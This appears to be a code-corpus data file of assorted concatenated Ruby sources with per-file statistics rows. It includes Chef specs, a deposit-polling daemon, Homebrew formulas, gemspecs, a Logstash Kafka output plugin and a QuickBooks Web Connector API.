allow(subject).to receive(:node).and_return(chef_run.node)
expected = 'mysql+pymysql://user:[email protected]:3306/nova?charset=utf8'
expect(
subject.db_uri('compute', 'user', 'pass')
).to eq(expected)
end
end
it 'returns compute slave db info hash when service found for default mysql' do
node.set['openstack']['endpoints']['db']['enabled_slave'] = true
allow(subject).to receive(:node).and_return(chef_run.node)
expected = 'mysql+pymysql://user:[email protected]:3316/nova?charset=utf8'
expect(
subject.db_uri('compute', 'user', 'pass', true)
).to eq(expected)
end
it 'returns image slave db info hash when service found for mariadb' do
node.set['openstack']['db']['service_type'] = 'mariadb'
node.set['openstack']['endpoints']['db']['enabled_slave'] = true
allow(subject).to receive(:node).and_return(chef_run.node)
expected = 'mysql+pymysql://user:[email protected]:3316/glance?charset=utf8'
expect(
subject.db_uri('image', 'user', 'pass', true)
).to eq(expected)
end
%w(galera percona-cluster).each do |db|
it "returns network slave db info hash when service found for #{db}" do
node.set['openstack']['db']['service_type'] = db
node.set['openstack']['endpoints']['db']['enabled_slave'] = true
allow(subject).to receive(:node).and_return(chef_run.node)
expected = 'mysql+pymysql://user:[email protected]:3316/neutron?charset=utf8'
expect(
subject.db_uri('network', 'user', 'pass', true)
).to eq(expected)
end
end
end
end
end
| 38.623377 | 127 | 0.559292 |
e21894d37d87fed52e049d4f6a89d8f88443ae35 | 1,198 | require File.join(ENV.fetch('RAILS_ROOT'), 'config', 'environment')
running = true
Signal.trap(:TERM) { running = false }
def process_deposits(coin, channel, deposit)
# Skip if transaction is processed.
return if PaymentTransaction::Normal.where(txid: deposit[:id]).exists?
# Skip zombie transactions (for which addresses don't exist).
recipients = deposit[:entries].map { |entry| entry[:address] }
return unless recipients.all? { |address| PaymentAddress.where(currency: coin.code, address: address).exists? }
Rails.logger.info "Missed #{coin.code.upcase} transaction: #{deposit[:id]}."
# Immediately enqueue job.
AMQPQueue.enqueue :deposit_coin, { txid: deposit[:id], channel_key: channel.key }
rescue => e
report_exception(e)
end
while running
channels = DepositChannel.all.each_with_object({}) { |ch, memo| memo[ch.currency] = ch }
coins = Currency.where(coin: true)
coins.each do |coin|
next unless (channel = channels[coin.code])
processed = 0
CoinAPI[coin.code.to_sym].each_deposit do |deposit|
break unless running
process_deposits(coin, channel, deposit)
break if (processed += 1) >= 100
end
end
Kernel.sleep 5
end
| 30.717949 | 113 | 0.706177 |
ac923f64b5232595c7566e3708f0c3ca668e4240 | 467 | # frozen_string_literal: true
module Types
class ContainerExpirationPolicyCadenceEnum < BaseEnum
OPTIONS_MAPPING = {
'1d': 'EVERY_DAY',
'7d': 'EVERY_WEEK',
'14d': 'EVERY_TWO_WEEKS',
'1month': 'EVERY_MONTH',
'3month': 'EVERY_THREE_MONTHS'
}.freeze
::ContainerExpirationPolicy.cadence_options.each do |option, description|
value OPTIONS_MAPPING[option], description: description, value: option.to_s
end
end
end
| 25.944444 | 81 | 0.691649 |
e93eed3d741cbc9046a0979b6b00254184bc0505 | 646 | require 'test_helper'
module Regaliator
module V15
class ClientTest < Minitest::Test
def setup
@config = Configuration.new
@subject = Client.new(@config)
end
def test_versioned_client_inherits_from_client
assert_operator V15::Client, :<, Regaliator::Client
end
%i(account bill biller rate transaction).each do |endpoint|
define_method("test_#{endpoint}_method_returns_#{endpoint}_instance") do
klass = "::Regaliator::V15::#{endpoint.capitalize}"
assert_instance_of Kernel.const_get(klass), @subject.send(endpoint)
end
end
end
end
end
| 26.916667 | 80 | 0.664087 |
1ca84ff098c4ba33da20716f9b3e574ced805b50 | 1,157 | class Slackcat < Formula
desc "Command-line utility for posting snippets to Slack"
homepage "https://github.com/vektorlab/slackcat"
url "https://github.com/bcicen/slackcat/archive/refs/tags/1.7.3.tar.gz"
sha256 "2e3ed7ad5ab3075a8e80a6a0b08a8c52bb8e6e39f6ab03597f456278bfa7768b"
license "MIT"
bottle do
sha256 cellar: :any_skip_relocation, arm64_big_sur: "f765a9df06043f889342eb317e72648bc4904bea55d5339b69399b3a8b4ec3ff"
sha256 cellar: :any_skip_relocation, big_sur: "176aa3f2c1f088a0dce065034c8a6d381830679db2425c4b4d690823e0b1e022"
sha256 cellar: :any_skip_relocation, catalina: "344233ded56abb6b28a5b4cde44cc58713a63e7a2b49a84b8c47c0ebc9d2d3f6"
sha256 cellar: :any_skip_relocation, mojave: "0aa9e136f18f6937cf156f00b850c37361a2f4616ea52783e471ded9de82ee7f"
sha256 cellar: :any_skip_relocation, x86_64_linux: "96518aa5c2d2ddc1c62a1ee163748bc0909be294eebc290156a6ca1908d6216a"
end
depends_on "go" => :build
def install
system "go", "build", *std_go_args(ldflags: "-s -w -X main.version=#{version}")
end
test do
assert_match version.to_s, shell_output("#{bin}/slackcat -v")
end
end
| 44.5 | 122 | 0.78911 |
1a711e0569a40d33a67e5baba55a4d0f4820743f | 1,019 | # coding: utf-8
lib = File.expand_path("../lib", __FILE__)
$LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
require "omniauth/xero/version"
Gem::Specification.new do |spec|
spec.name = "omniauth-xero"
spec.version = Omniauth::Xero::VERSION
spec.authors = ["Kale Worsley"]
spec.email = ["[email protected]"]
spec.description = "Xero authentication strategy for OmniAuth."
spec.summary = "Xero authentication strategy for OmniAuth."
spec.homepage = "http://github.com/kaleworsley/omniauth-xero"
spec.license = "MIT"
spec.files = `git ls-files`.split($/)
spec.executables = spec.files.grep(%r{^bin/}) { |f| File.basename(f) }
spec.test_files = spec.files.grep(%r{^(test|spec|features)/})
spec.require_paths = ["lib"]
spec.add_runtime_dependency "omniauth-oauth", "~> 1.0"
spec.add_development_dependency "bundler", "~> 1.3"
spec.add_development_dependency "rake"
spec.add_development_dependency "rspec", "~> 3.0"
end
| 37.740741 | 74 | 0.667321 |
618a647d1c72b9a096e7c177111623237f918c4b | 19,616 | require 'logstash/namespace'
require 'logstash/outputs/base'
require 'java'
require 'logstash-integration-kafka_jars.rb'
require 'logstash/plugin_mixins/kafka_support'
# Write events to a Kafka topic. This uses the Kafka Producer API to write messages to a topic on
# the broker.
#
# Here's a compatibility matrix that shows the Kafka client versions that are compatible with each combination
# of Logstash and the Kafka output plugin:
#
# [options="header"]
# |==========================================================
# |Kafka Client Version |Logstash Version |Plugin Version |Why?
# |0.8 |2.0.0 - 2.x.x |<3.0.0 |Legacy, 0.8 is still popular
# |0.9 |2.0.0 - 2.3.x | 3.x.x |Works with the old Ruby Event API (`event['product']['price'] = 10`)
# |0.9 |2.4.x - 5.x.x | 4.x.x |Works with the new getter/setter APIs (`event.set('[product][price]', 10)`)
# |0.10.0.x |2.4.x - 5.x.x | 5.x.x |Not compatible with the <= 0.9 broker
# |0.10.1.x |2.4.x - 5.x.x | 6.x.x |
# |==========================================================
#
# NOTE: We recommended that you use matching Kafka client and broker versions. During upgrades, you should
# upgrade brokers before clients because brokers target backwards compatibility. For example, the 0.9 broker
# is compatible with both the 0.8 consumer and 0.9 consumer APIs, but not the other way around.
#
# This output supports connecting to Kafka over:
#
# * SSL (requires plugin version 3.0.0 or later)
# * Kerberos SASL (requires plugin version 5.1.0 or later)
#
# By default security is disabled but can be turned on as needed.
#
# The only required configuration is the topic_id. The default codec is plain,
# so events will be persisted on the broker in plain format. Logstash will encode your messages with not
# only the message but also with a timestamp and hostname. If you do not want anything but your message
# passing through, you should make the output configuration something like:
# [source,ruby]
# output {
# kafka {
# codec => plain {
# format => "%{message}"
# }
# topic_id => "mytopic"
# }
# }
# For more information see http://kafka.apache.org/documentation.html#theproducer
#
# Kafka producer configuration: http://kafka.apache.org/documentation.html#newproducerconfigs
class LogStash::Outputs::Kafka < LogStash::Outputs::Base
java_import org.apache.kafka.clients.producer.ProducerRecord
include LogStash::PluginMixins::KafkaSupport
declare_threadsafe!
config_name 'kafka'
default :codec, 'plain'
# The number of acknowledgments the producer requires the leader to have received
# before considering a request complete.
#
# acks=0, the producer will not wait for any acknowledgment from the server at all.
# acks=1, This will mean the leader will write the record to its local log but
# will respond without awaiting full acknowledgement from all followers.
# acks=all, This means the leader will wait for the full set of in-sync replicas to acknowledge the record.
config :acks, :validate => ["0", "1", "all"], :default => "1"
# The producer will attempt to batch records together into fewer requests whenever multiple
# records are being sent to the same partition. This helps performance on both the client
# and the server. This configuration controls the default batch size in bytes.
config :batch_size, :validate => :number, :default => 16_384 # Kafka default
# This is for bootstrapping and the producer will only use it for getting metadata (topics,
# partitions and replicas). The socket connections for sending the actual data will be
# established based on the broker information returned in the metadata. The format is
# `host1:port1,host2:port2`, and the list can be a subset of brokers or a VIP pointing to a
# subset of brokers.
config :bootstrap_servers, :validate => :string, :default => 'localhost:9092'
# The total bytes of memory the producer can use to buffer records waiting to be sent to the server.
config :buffer_memory, :validate => :number, :default => 33_554_432 # (32M) Kafka default
# The compression type for all data generated by the producer.
# The default is none (i.e. no compression). Valid values are none, gzip, snappy, lz4 or zstd.
config :compression_type, :validate => ["none", "gzip", "snappy", "lz4", "zstd"], :default => "none"
# How DNS lookups should be done. If set to `use_all_dns_ips`, when the lookup returns multiple
# IP addresses for a hostname, they will all be attempted to connect to before failing the
# connection. If the value is `resolve_canonical_bootstrap_servers_only` each entry will be
# resolved and expanded into a list of canonical names.
config :client_dns_lookup, :validate => ["default", "use_all_dns_ips", "resolve_canonical_bootstrap_servers_only"], :default => "use_all_dns_ips"
# The id string to pass to the server when making requests.
# The purpose of this is to be able to track the source of requests beyond just
# ip/port by allowing a logical application name to be included with the request
config :client_id, :validate => :string
# Serializer class for the key of the message
config :key_serializer, :validate => :string, :default => 'org.apache.kafka.common.serialization.StringSerializer'
# The producer groups together any records that arrive in between request
# transmissions into a single batched request. Normally this occurs only under
# load when records arrive faster than they can be sent out. However in some circumstances
# the client may want to reduce the number of requests even under moderate load.
# This setting accomplishes this by adding a small amount of artificial delay—that is,
# rather than immediately sending out a record the producer will wait for up to the given delay
# to allow other records to be sent so that the sends can be batched together.
config :linger_ms, :validate => :number, :default => 0 # Kafka default
# The maximum size of a request
config :max_request_size, :validate => :number, :default => 1_048_576 # (1MB) Kafka default
# The key for the message
config :message_key, :validate => :string
# the timeout setting for initial metadata request to fetch topic metadata.
config :metadata_fetch_timeout_ms, :validate => :number, :default => 60_000
# the max time in milliseconds before a metadata refresh is forced.
config :metadata_max_age_ms, :validate => :number, :default => 300_000 # (5m) Kafka default
# Partitioner to use - can be `default`, `uniform_sticky`, `round_robin` or a fully qualified class name of a custom partitioner.
config :partitioner, :validate => :string
# The size of the TCP receive buffer to use when reading data
config :receive_buffer_bytes, :validate => :number, :default => 32_768 # (32KB) Kafka default
# The amount of time to wait before attempting to reconnect to a given host when a connection fails.
config :reconnect_backoff_ms, :validate => :number, :default => 50 # Kafka default
# The configuration controls the maximum amount of time the client will wait
# for the response of a request. If the response is not received before the timeout
# elapses the client will resend the request if necessary or fail the request if
# retries are exhausted.
config :request_timeout_ms, :validate => :number, :default => 40_000 # (40s) Kafka default
# The default retry behavior is to retry until successful. To prevent data loss,
# the use of this setting is discouraged.
#
# If you choose to set `retries`, a value greater than zero will cause the
# client to only retry a fixed number of times. This will result in data loss
# if a transient error outlasts your retry count.
#
# A value less than zero is a configuration error.
config :retries, :validate => :number
# The amount of time to wait before attempting to retry a failed produce request to a given topic partition.
config :retry_backoff_ms, :validate => :number, :default => 100 # Kafka default
# The size of the TCP send buffer to use when sending data.
config :send_buffer_bytes, :validate => :number, :default => 131_072 # (128KB) Kafka default
# The truststore type.
config :ssl_truststore_type, :validate => :string
# The JKS truststore path to validate the Kafka broker's certificate.
config :ssl_truststore_location, :validate => :path
# The truststore password
config :ssl_truststore_password, :validate => :password
# The keystore type.
config :ssl_keystore_type, :validate => :string
# If client authentication is required, this setting stores the keystore path.
config :ssl_keystore_location, :validate => :path
# If client authentication is required, this setting stores the keystore password
config :ssl_keystore_password, :validate => :password
# The password of the private key in the key store file.
config :ssl_key_password, :validate => :password
# Algorithm to use when verifying host. Set to "" to disable
config :ssl_endpoint_identification_algorithm, :validate => :string, :default => 'https'
# Security protocol to use, which can be either of PLAINTEXT,SSL,SASL_PLAINTEXT,SASL_SSL
config :security_protocol, :validate => ["PLAINTEXT", "SSL", "SASL_PLAINTEXT", "SASL_SSL"], :default => "PLAINTEXT"
# http://kafka.apache.org/documentation.html#security_sasl[SASL mechanism] used for client connections.
# This may be any mechanism for which a security provider is available.
# GSSAPI is the default mechanism.
config :sasl_mechanism, :validate => :string, :default => "GSSAPI"
# The Kerberos principal name that Kafka broker runs as.
# This can be defined either in Kafka's JAAS config or in Kafka's config.
config :sasl_kerberos_service_name, :validate => :string
# The Java Authentication and Authorization Service (JAAS) API supplies user authentication and authorization
# services for Kafka. This setting provides the path to the JAAS file. Sample JAAS file for Kafka client:
# [source,java]
# ----------------------------------
# KafkaClient {
# com.sun.security.auth.module.Krb5LoginModule required
# useTicketCache=true
# renewTicket=true
# serviceName="kafka";
# };
# ----------------------------------
#
# Please note that specifying `jaas_path` and `kerberos_config` in the config file will add these
# to the global JVM system properties. This means if you have multiple Kafka inputs, all of them would be sharing the same
# `jaas_path` and `kerberos_config`. If this is not desirable, you would have to run separate instances of Logstash on
# different JVM instances.
config :jaas_path, :validate => :path
# JAAS configuration settings. This allows JAAS config to be a part of the plugin configuration and allows for different JAAS configuration per each plugin config.
config :sasl_jaas_config, :validate => :string
# Optional path to kerberos config file. This is krb5.conf style as detailed in https://web.mit.edu/kerberos/krb5-1.12/doc/admin/conf_files/krb5_conf.html
config :kerberos_config, :validate => :path
# The topic to produce messages to
config :topic_id, :validate => :string, :required => true
# Serializer class for the value of the message
config :value_serializer, :validate => :string, :default => 'org.apache.kafka.common.serialization.StringSerializer'
public
def register
@thread_batch_map = Concurrent::Hash.new
if [email protected]?
if @retries < 0
raise ConfigurationError, "A negative retry count (#{@retries}) is not valid. Must be a value >= 0"
end
logger.warn("Kafka output is configured with finite retry. This instructs Logstash to LOSE DATA after a set number of send attempts fails. If you do not want to lose data if Kafka is down, then you must remove the retry setting.", :retries => @retries)
end
@producer = create_producer
if value_serializer == 'org.apache.kafka.common.serialization.StringSerializer'
@codec.on_event do |event, data|
write_to_kafka(event, data)
end
elsif value_serializer == 'org.apache.kafka.common.serialization.ByteArraySerializer'
@codec.on_event do |event, data|
write_to_kafka(event, data.to_java_bytes)
end
else
raise ConfigurationError, "'value_serializer' only supports org.apache.kafka.common.serialization.ByteArraySerializer and org.apache.kafka.common.serialization.StringSerializer"
end
end
def prepare(record)
# This output is threadsafe, so we need to keep a batch per thread.
@thread_batch_map[Thread.current].add(record)
end
def multi_receive(events)
t = Thread.current
if !@thread_batch_map.include?(t)
@thread_batch_map[t] = java.util.ArrayList.new(events.size)
end
events.each do |event|
@codec.encode(event)
end
batch = @thread_batch_map[t]
if batch.any?
retrying_send(batch)
batch.clear
end
end
def retrying_send(batch)
remaining = @retries
while batch.any?
unless remaining.nil?
if remaining < 0
# TODO(sissel): Offer to DLQ? Then again, if it's a transient fault,
# DLQing would make things worse (you dlq data that would be successful
# after the fault is repaired)
logger.info("Exhausted user-configured retry count when sending to Kafka. Dropping these events.",
:max_retries => @retries, :drop_count => batch.count)
break
end
remaining -= 1
end
failures = []
futures = batch.collect do |record|
begin
# send() can throw an exception even before the future is created.
@producer.send(record)
rescue org.apache.kafka.common.errors.InterruptException,
org.apache.kafka.common.errors.RetriableException => e
logger.info("producer send failed, will retry sending", :exception => e.class, :message => e.message)
failures << record
nil
rescue org.apache.kafka.common.KafkaException => e
# This error is not retriable, drop event
# TODO: add DLQ support
logger.warn("producer send failed, dropping record",:exception => e.class, :message => e.message,
:record_value => record.value)
nil
end
end
futures.each_with_index do |future, i|
# We cannot skip nils using `futures.compact` because then our index `i` will not align with `batch`
unless future.nil?
begin
future.get
rescue java.util.concurrent.ExecutionException => e
# TODO(sissel): Add metric to count failures, possibly by exception type.
if e.get_cause.is_a? org.apache.kafka.common.errors.RetriableException or
e.get_cause.is_a? org.apache.kafka.common.errors.InterruptException
logger.info("producer send failed, will retry sending", :exception => e.cause.class,
:message => e.cause.message)
failures << batch[i]
elsif e.get_cause.is_a? org.apache.kafka.common.KafkaException
# This error is not retriable, drop event
# TODO: add DLQ support
logger.warn("producer send failed, dropping record", :exception => e.cause.class,
:message => e.cause.message, :record_value => batch[i].value)
end
end
end
end
# No failures? Cool. Let's move on.
break if failures.empty?
# Otherwise, retry with any failed transmissions
if remaining.nil? || remaining >= 0
delay = @retry_backoff_ms / 1000.0
logger.info("Sending batch to Kafka failed. Will retry after a delay.", :batch_size => batch.size,
:failures => failures.size,
:sleep => delay)
batch = failures
sleep(delay)
end
end
end
def close
@producer.close
end
private
def write_to_kafka(event, serialized_data)
if @message_key.nil?
record = ProducerRecord.new(event.sprintf(@topic_id), serialized_data)
else
record = ProducerRecord.new(event.sprintf(@topic_id), event.sprintf(@message_key), serialized_data)
end
prepare(record)
rescue LogStash::ShutdownSignal
logger.debug('producer received shutdown signal')
rescue => e
logger.warn('producer threw exception, restarting', :exception => e.class, :message => e.message)
end
def create_producer
begin
props = java.util.Properties.new
kafka = org.apache.kafka.clients.producer.ProducerConfig
props.put(kafka::ACKS_CONFIG, acks)
props.put(kafka::BATCH_SIZE_CONFIG, batch_size.to_s)
props.put(kafka::BOOTSTRAP_SERVERS_CONFIG, bootstrap_servers)
props.put(kafka::BUFFER_MEMORY_CONFIG, buffer_memory.to_s)
props.put(kafka::COMPRESSION_TYPE_CONFIG, compression_type)
props.put(kafka::CLIENT_DNS_LOOKUP_CONFIG, client_dns_lookup)
props.put(kafka::CLIENT_ID_CONFIG, client_id) unless client_id.nil?
props.put(kafka::KEY_SERIALIZER_CLASS_CONFIG, key_serializer)
props.put(kafka::LINGER_MS_CONFIG, linger_ms.to_s)
props.put(kafka::MAX_REQUEST_SIZE_CONFIG, max_request_size.to_s)
props.put(kafka::METADATA_MAX_AGE_CONFIG, metadata_max_age_ms.to_s) unless metadata_max_age_ms.nil?
unless partitioner.nil?
props.put(kafka::PARTITIONER_CLASS_CONFIG, partitioner = partitioner_class)
logger.debug('producer configured using partitioner', :partitioner_class => partitioner)
end
props.put(kafka::RECEIVE_BUFFER_CONFIG, receive_buffer_bytes.to_s) unless receive_buffer_bytes.nil?
props.put(kafka::RECONNECT_BACKOFF_MS_CONFIG, reconnect_backoff_ms.to_s) unless reconnect_backoff_ms.nil?
props.put(kafka::REQUEST_TIMEOUT_MS_CONFIG, request_timeout_ms.to_s) unless request_timeout_ms.nil?
props.put(kafka::RETRIES_CONFIG, retries.to_s) unless retries.nil?
props.put(kafka::RETRY_BACKOFF_MS_CONFIG, retry_backoff_ms.to_s)
props.put(kafka::SEND_BUFFER_CONFIG, send_buffer_bytes.to_s)
props.put(kafka::VALUE_SERIALIZER_CLASS_CONFIG, value_serializer)
props.put("security.protocol", security_protocol) unless security_protocol.nil?
if security_protocol == "SSL"
set_trustore_keystore_config(props)
elsif security_protocol == "SASL_PLAINTEXT"
set_sasl_config(props)
elsif security_protocol == "SASL_SSL"
set_trustore_keystore_config(props)
set_sasl_config(props)
end
org.apache.kafka.clients.producer.KafkaProducer.new(props)
rescue => e
logger.error("Unable to create Kafka producer from given configuration",
:kafka_error_message => e,
:cause => e.respond_to?(:getCause) ? e.getCause() : nil)
raise e
end
end
def partitioner_class
case partitioner
when 'round_robin'
'org.apache.kafka.clients.producer.RoundRobinPartitioner'
when 'uniform_sticky'
'org.apache.kafka.clients.producer.UniformStickyPartitioner'
when 'default'
'org.apache.kafka.clients.producer.internals.DefaultPartitioner'
else
unless partitioner.index('.')
raise LogStash::ConfigurationError, "unsupported partitioner: #{partitioner.inspect}"
end
partitioner # assume a fully qualified class-name
end
end
end #class LogStash::Outputs::Kafka
| 49.660759 | 258 | 0.699429 |
b9dbf512e1b9c6bdbc679effaae57e96ac3a77c2 | 325 | require File.join(File.dirname(__FILE__), '..', 'spec_helper')
describe "math:tan" do
it "is implemented" do
Machine.new.should respond_to(:tan)
end
it "requires one operand" do
lambda { Machine.run([:tan]) }.should underflow_stack
lambda { Machine.run([nil, :tan]) }.should_not underflow_stack
end
end
| 25 | 66 | 0.695385 |
03b46c5bf3b992ed98a58f4924e9bdd4233b72d4 | 1,145 | require 'chef_helper'
RSpec.describe Registry do
before do
allow(Gitlab).to receive(:[]).and_call_original
end
context 'registry is disabled' do
before do
stub_gitlab_rb(
registry: {
enabled: false
}
)
end
it 'should return false' do
expect(described_class.auto_enable).to be_falsey
end
end
context 'registry_external_url is set' do
before do
stub_gitlab_rb(
registry_external_url: 'https://registry.example.com'
)
end
it 'should return false' do
expect(described_class.auto_enable).to be_falsey
end
end
context 'lets encrypt is not enabled' do
before do
stub_gitlab_rb(
letsencrypt: {
enable: false
}
)
end
it 'should return false' do
expect(described_class.auto_enable).to be_falsey
end
end
context 'external_url is a relative url' do
before do
stub_gitlab_rb(
external_url: 'https://registry.example.com/path'
)
end
it 'should return false' do
expect(described_class.auto_enable).to be_falsey
end
end
end
| 19.083333 | 61 | 0.634061 |
1d493f56859972b099cf8c6678dd5da9f8e02a74 | 2,157 | # frozen_string_literal: true
require "uri"
require "cgi"
require "net/http"
require "capybara"
require "capybara/jsdom/version"
require "capybara/jsdom/node"
require "capybara/jsdom/browser"
module Capybara
module Jsdom
# Capybara driver using JSDom lightweight fast DOM implementation.
class Driver < Capybara::Driver::Base
attr_writer :session
attr_accessor :browser
attr_reader :status_code
def initialize(app, options = {})
@app = app
@options = options.dup
@browser = options[:browser] || Browser.new(@options)
end
def current_url
browser.current_url
end
def visit(url)
browser.load url
end
def refresh
visit current_url
end
def html
browser.html
end
def find_css(query)
nodes = browser.find_css query
nodes.map { |n| Node.new(self, n, browser) }
end
def find_xpath(query)
nodes = browser.find_xpath query
nodes.map { |n| Node.new(self, n, browser) }
end
def go_back
raise Capybara::NotSupportedByDriverError, "Capybara::Driver::Base#go_back"
end
def go_forward
raise Capybara::NotSupportedByDriverError, "Capybara::Driver::Base#go_forward"
end
def execute_script(script, *args)
raise Capybara::NotSupportedByDriverError, "Capybara::Driver::Base#execute_script"
end
def evaluate_script(script, *args)
raise Capybara::NotSupportedByDriverError, "Capybara::Driver::Base#evaluate_script"
end
def evaluate_async_script(script, *args)
raise Capybara::NotSupportedByDriverError, "Capybara::Driver::Base#evaluate_script_asnyc"
end
def save_screenshot(path, options={})
raise Capybara::NotSupportedByDriverError, "Capybara::Driver::Base#save_screenshot"
end
def response_headers
@response
end
# Default methods
def invalid_element_errors
[]
end
def wait?
true
end
def reset!; end
def needs_server?
true
end
end
end
end
| 22.010204 | 97 | 0.637459 |
21e42471028860849c76896f1b786297aca983cd | 2,393 | module ActiveScaffold::Config
class FieldSearch < Base
self.crud_type = :read
def initialize(core_config)
@core = core_config
@text_search = self.class.text_search
# start with the ActionLink defined globally
@link = self.class.link.clone
end
# global level configuration
# --------------------------
# the ActionLink for this action
cattr_reader :link
@@link = ActiveScaffold::DataStructures::ActionLink.new('show_search', :label => :search, :type => :collection, :security_method => :search_authorized?)
def self.full_text_search=(value)
::ActiveSupport::Deprecation.warn("full_text_search is deprecated, use text_search = :full instead", caller)
@@text_search = :full
end
def self.full_text_search?
::ActiveSupport::Deprecation.warn("full_text_search? is deprecated, use text_search == :full instead", caller)
@@text_search == :full
end
# A flag for how the search should do full-text searching in the database:
# * :full: LIKE %?%
# * :start: LIKE ?%
# * :end: LIKE %?
# * false: LIKE ?
# Default is :full
cattr_accessor :text_search
@@text_search = :full
# instance-level configuration
# ----------------------------
# provides access to the list of columns specifically meant for the Search to use
def columns
# we want to delay initializing to the @core.columns set for as long as possible. Too soon and .search_sql will not be available to .searchable?
unless @columns
self.columns = @core.columns._inheritable
self.columns.exclude @core.columns.active_record_class.locking_column.to_sym
end
@columns
end
public :columns=
# A flag for how the search should do full-text searching in the database:
# * :full: LIKE %?%
# * :start: LIKE ?%
# * :end: LIKE %?
# * false: LIKE ?
# Default is :full
attr_accessor :text_search
def full_text_search=(value)
::ActiveSupport::Deprecation.warn("full_text_search is deprecated, use text_search = :full instead", caller)
@text_search = :full
end
def full_text_search?
::ActiveSupport::Deprecation.warn("full_text_search? is deprecated, use text_search == :full instead", caller)
@text_search == :full
end
# the ActionLink for this action
attr_accessor :link
end
end
| 32.780822 | 156 | 0.653991 |
5dbc183ff88801ee0b6b0f659240eedbc0d49c3b | 384 | require 'medusa'
begin
# make sure that the first option is a URL we can crawl
url = URI(ARGV[0])
rescue
puts <<-INFO
Usage:
medusa count <url>
Synopsis:
Crawls a site starting at the given URL and outputs the total number
of unique pages on the site.
INFO
exit(0)
end
Medusa.crawl(url) do |medusa|
medusa.after_crawl do |pages|
puts pages.uniq!.size
end
end
| 16.695652 | 70 | 0.705729 |
627b0b939c79f3e73ccad422a01704968ec6c410 | 1,047 | require 'test_helper'
class UsersControllerTest < ActionDispatch::IntegrationTest
include Devise::Test::IntegrationHelpers
setup do
sign_in users(:admin)
@user = users(:admin)
end
test "should get index" do
get users_url
assert_response :success
end
test "should get new" do
get new_user_url
assert_response :success
end
test "should show user" do
get users_url('en',@user)
assert_response :success
end
test "should get edit" do
get edit_user_url('en',@user)
assert_response :success
end
test "should update user" do
patch user_url('en',@user), params: { user: {
first_name: 'Admin',
last_name: '',
email: '[email protected]',
is_active: true,
passowrd: 'password',
user_types: :manager
} }
assert_redirected_to users_url
end
test "should destroy user" do
assert_difference('User.count', -1) do
delete user_url('en',@user)
end
assert_redirected_to users_url
end
end | 20.134615 | 59 | 0.640879 |
4a48fb8e6fd8a93d012b48046bc8ff6bdbbe7a32 | 4,196 | class QbwcApi < ActionWebService::API::Base
inflect_names false
# --- [ QBWC server version control ] ---
# Expects:
# * string ticket = A GUID based ticket string to maintain identity of QBWebConnector
# Returns string:
# * Return a string describing the server version and any other information that you want your user to see.
api_method :serverVersion,
:expects => [{:ticket => :string}],
:returns => [:string]
# --- [ QBWC version control ] ---
# Expects:
# * string strVersion = QBWC version number
# Returns string:
# * NULL or <emptyString> = QBWC will let the web service update
# * "E:<any text>" = popup ERROR dialog with <any text>, abort update and force download of new QBWC.
# * "W:<any text>" = popup WARNING dialog with <any text>, and give user choice to update or not.
api_method :clientVersion,
:expects => [{:strVersion => :string}],
:returns => [[:string]]
# --- [ Authenticate web connector ] ---
# Expects:
# * string strUserName = username from QWC file
# * string strPassword = password
# Returns string[2]:
# * string[0] = ticket (guid)
# * string[1] =
# - empty string = use current company file
# - "none" = no further request/no further action required
# - "nvu" = not valid user
# - any other string value = use this company file
api_method :authenticate,
:expects => [{:strUserName => :string}, {:strPassword => :string}],
:returns => [[:string]]
# --- [ To facilitate capturing of QuickBooks error and notifying it to web services ] ---
# Expects:
# * string ticket = A GUID based ticket string to maintain identity of QBWebConnector
# * string hresult = An HRESULT value thrown by QuickBooks when trying to make connection
# * string message = An error message corresponding to the HRESULT
# Returns string:
# * "done" = no further action required from QBWebConnector
# * any other string value = use this name for company file
api_method :connectionError,
:expects => [{:ticket => :string}, {:hresult => :string}, {:message => :string}],
:returns => [:string]
# --- [ Facilitates web service to send request XML to QuickBooks via QBWC ] ---
# Expects:
# * int qbXMLMajorVers
# * int qbXMLMinorVers
# * string ticket
# * string strHCPResponse
# * string strCompanyFileName
# * string Country
# * int qbXMLMajorVers
# * int qbXMLMinorVers
# Returns string:
# * "any_string" = Request XML for QBWebConnector to process
# * "" = No more request XML
api_method :sendRequestXML,
:expects => [{:ticket => :string}, {:strHCPResponse => :string},
{:strCompanyFileName => :string}, {:Country => :string},
{:qbXMLMajorVers => :int}, {:qbXMLMinorVers => :int}],
:returns => [:string]
# --- [ Facilitates web service to receive response XML from QuickBooks via QBWC ] ---
# Expects:
# * string ticket
# * string response
# * string hresult
# * string message
# Returns int:
# * Greater than zero = There are more request to send
# * 100 = Done. no more request to send
# * Less than zero = Custom Error codes
api_method :receiveResponseXML,
:expects => [{:ticket => :string}, {:response => :string},
{:hresult => :string}, {:message => :string}],
:returns => [:int]
# --- [ Facilitates QBWC to receive last web service error ] ---
# Expects:
# * string ticket
# Returns string:
# * error message describing last web service error
api_method :getLastError,
:expects => [{:ticket => :string}],
:returns => [:string]
# --- [ QBWC will call this method at the end of a successful update session ] ---
# Expects:
# * string ticket
# Returns string:
# * closeConnection result. Ex: "OK"
api_method :closeConnection,
:expects => [{:ticket => :string}],
:returns => [:string]
end | 40.737864 | 111 | 0.592946 |
f82b817af08470b60b8899537226f2308de9413d | 197 | require "omniauth-gca/version"
require "omniauth/strategies/gca"
require "gca_sso_client/engine"
require "gca_sso_client/concerns/controllers/gca_sso_client_authentication"
module GcaSsoClient
end | 28.142857 | 75 | 0.862944 |
1dea8a150e81ca037d298bc28aaed25c7e174955 | 591 | class Admin::TaxDocsController < Admin::BaseController
before_action :year_check, except: [:index]
def index
# FIXME
@years = [2013]
end
def show
redirect_to action: :index, anchor: "y#{year}"
end
def form_1065
@form_1065 = TaxDocs::Form1065Presenter.new(year)
end
def schedule_d
@schedule_d = TaxDocs::ScheduleDPresenter.new(year)
end
def schedule_k
@schedule_k = TaxDocs::ScheduleKPresenter.new(year)
end
private
def year_check
if year.blank?
return redirect_to '/admin'
end
end
def year
params[:id]
end
end
| 16.416667 | 55 | 0.675127 |
39f6c015dcc735c3a99b4c7ffc12adae65dd7dec | 1,598 | class Vramsteg < Formula
desc "Add progress bars to command-line applications"
homepage "https://gothenburgbitfactory.org/projects/vramsteg.html"
url "https://gothenburgbitfactory.org/download/vramsteg-1.1.0.tar.gz"
sha256 "9cc82eb195e4673d9ee6151373746bd22513033e96411ffc1d250920801f7037"
head "https://github.com/GothenburgBitFactory/vramsteg.git", branch: "1.1.1"
livecheck do
url :head
regex(/^v?(\d+(?:\.\d+)+)$/i)
end
bottle do
cellar :any_skip_relocation
